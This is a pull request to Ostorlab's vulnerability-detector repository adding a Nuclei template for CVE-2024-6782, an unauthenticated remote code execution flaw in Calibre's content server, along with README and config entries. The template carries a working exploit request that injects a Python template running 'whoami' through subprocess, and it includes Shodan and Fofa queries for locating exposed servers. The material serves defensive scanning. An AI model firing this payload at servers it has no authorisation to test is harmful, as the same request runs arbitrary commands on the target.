### PR TITLE
Add Detection for CVE-2024-6782.

### DIFF
--- a/README.md
+++ b/README.md
@@ -205,6 +205,7 @@ For the moment, we are currently focused on the CISA KEV Database and Google Tsu
 | CVE-2024-5932                                           |      ✅      | Custom Nuclei template by Ostorlab.                     |   2024-08-19   |
 | CVE-2024-7593                                           |      ✅      | Official Nuclei template.                               |   2024-08-13   |
 | CVE-2024-43044                                          |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2024-08-07   |
+| CVE-2024-6782                                           |      ✅      | Official Nuclei template.                               |   2024-08-06   |
 | CVE-2024-7029                                           |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2024-08-02   |
 | CVE-2024-38856                                          |      ✅      | Official Nuclei template.                               |   2024-08-05   |
 | CVE-2024-7120                                           |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2024-07-26   |

--- a/agent_group.yaml
+++ b/agent_group.yaml
@@ -310,6 +310,7 @@ agents:
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-36404.yaml
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-56145.yaml
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-43919.yaml
+            - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-6782.yaml
       - name: use_default_templates
         type: boolean
         description: use nuclei's default templates to scan.

--- a/nuclei/CVE-2024-6782.yaml
+++ b/nuclei/CVE-2024-6782.yaml
@@ -1,0 +1,66 @@
+id: CVE-2024-6782
+
+info:
+  name: Calibre <= 7.14.0 Remote Code Execution
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
+  reference:
+    - https://starlabs.sg/advisories/24/24-6781/
+  classification:
+    cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    vendor: calibre-ebook
+    product: calibre
+    shodan-query: html:"Calibre"
+    fofa-query: "Server: calibre"
+    max-request: 2
+  tags: cve,cve2024,calibre,rce
+
+http:
+  - raw:
+      - |
+        GET /interface-data/books-init HTTP/1.1
+        Host: {{Hostname}}
+        Referer: {{RootURL}}
+
+    extractors:
+      - type: json
+        name: book_ids
+        internal: true
+        json:
+          - '.search_result.book_ids[0]'
+
+  - raw:
+      - |
+        POST /cdb/cmd/list HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        [
+            ["template"],
+            "",
+            "",
+            "",
+            {{book_ids}},
+           "python:def evaluate(a, b):\n  import subprocess\n  try:\n    return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\n  except Exception:\n    return subprocess.check_output(['sh', '-c', 'whoami'])\n"
+        ]
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "b'([^']+)"
+
+      - type: word
+        part: content_type
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
+# digest: 4a0a0047304502204cec92ff505c5d1872709eedbef9528417eccc62eab41d891062bdf660383c12022100ed40e6ac88eb07734b9955e9e60e111a38f29f998f8c28665bcfbc5e5c53d530:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
The vulnerable versions are a bit old, and most of the available online targets in Shodan and Fofa are not vulnerable (at least the 2 first free pages).